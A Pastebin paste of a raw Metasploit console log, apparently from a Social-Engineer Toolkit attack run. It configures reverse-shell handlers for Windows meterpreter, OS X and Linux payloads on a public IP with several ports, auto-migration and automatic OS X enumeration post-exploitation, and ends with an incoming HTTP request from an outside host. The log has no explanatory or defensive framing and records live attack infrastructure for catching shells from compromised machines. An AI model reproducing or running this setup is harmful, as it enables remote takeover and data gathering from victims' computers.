daily pastebin goal
69%
SHARE
TWEET

Untitled

a guest Oct 19th, 2018 67 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.        =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
  2. + -- --=[ 943 exploits - 504 auxiliary - 152 post
  3. + -- --=[ 251 payloads - 28 encoders - 8 nops
  4.        =[ svn r15823 updated today (2012.09.05)
  5.  
  6. [*] Processing /home/dan/src/set/src/program_junk/meta_config for ERB directives.
  7. resource (/home/dan/src/set/src/program_junk/meta_config)> use exploit/multi/handler
  8. resource (/home/dan/src/set/src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
  9. PAYLOAD => windows/meterpreter/reverse_tcp
  10. resource (/home/dan/src/set/src/program_junk/meta_config)> set LHOST 0.0.0.0
  11. LHOST => 0.0.0.0
  12. resource (/home/dan/src/set/src/program_junk/meta_config)> set LPORT 6665
  13. LPORT => 6665
  14. resource (/home/dan/src/set/src/program_junk/meta_config)> set ExitOnSession false
  15. ExitOnSession => false
  16. resource (/home/dan/src/set/src/program_junk/meta_config)> set AutoRunScript migrate -f
  17. AutoRunScript => migrate -f
  18. resource (/home/dan/src/set/src/program_junk/meta_config)> exploit -j
  19. [*] Exploit running as background job.
  20. resource (/home/dan/src/set/src/program_junk/meta_config)> use exploit/multi/handler
  21. resource (/home/dan/src/set/src/program_junk/meta_config)> set PAYLOAD osx/x86/shell_reverse_tcp
  22. PAYLOAD => osx/x86/shell_reverse_tcp
  23. resource (/home/dan/src/set/src/program_junk/meta_config)> set LHOST 173.66.94.104
  24. LHOST => 173.66.94.104
  25. resource (/home/dan/src/set/src/program_junk/meta_config)> set LPORT 6661
  26. [*] Started reverse handler on 0.0.0.0:6665
  27. LPORT => 6661
  28. resource (/home/dan/src/set/src/program_junk/meta_config)> set InitialAutoRunScript post/osx/gather/enum_osx
  29. InitialAutoRunScript => post/osx/gather/enum_osx
  30. [*] Starting the payload handler...
  31. resource (/home/dan/src/set/src/program_junk/meta_config)> set ExitOnSession false
  32. ExitOnSession => false
  33. resource (/home/dan/src/set/src/program_junk/meta_config)> exploit -j
  34. [*] Exploit running as background job.
  35. resource (/home/dan/src/set/src/program_junk/meta_config)> use exploit/multi/handler
  36. resource (/home/dan/src/set/src/program_junk/meta_config)> set PAYLOAD linux/x86/shell/reverse_tcp
  37. PAYLOAD => linux/x86/shell/reverse_tcp
  38. resource (/home/dan/src/set/src/program_junk/meta_config)> set LHOST 173.66.94.104
  39. LHOST => 173.66.94.104
  40. resource (/home/dan/src/set/src/program_junk/meta_config)> set LPORT 6662
  41. LPORT => 6662
  42. [-] Handler failed to bind to 173.66.94.104:6661
  43. resource (/home/dan/src/set/src/program_junk/meta_config)> set ExitOnSession false
  44. [*] Started reverse handler on 0.0.0.0:6661
  45. ExitOnSession => false
  46. resource (/home/dan/src/set/src/program_junk/meta_config)> exploit -j
  47. [*] Starting the payload handler...
  48. [*] Exploit running as background job.
  49. msf  exploit(handler) >
  50. [-] Handler failed to bind to 173.66.94.104:6662
  51. [*] Started reverse handler on 0.0.0.0:6662
  52. [*] Starting the payload handler...
  53. ?-?-?-?.hlrn.qwest.net - - [06/Sep/2012 23:37:54] "GET / HTTP/1.1" 200 -
  54.                                                                               ----------------------------------------
  55.                                                                                                                       Exception happened during processing of request from ('?.?.?.?', 12942)
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top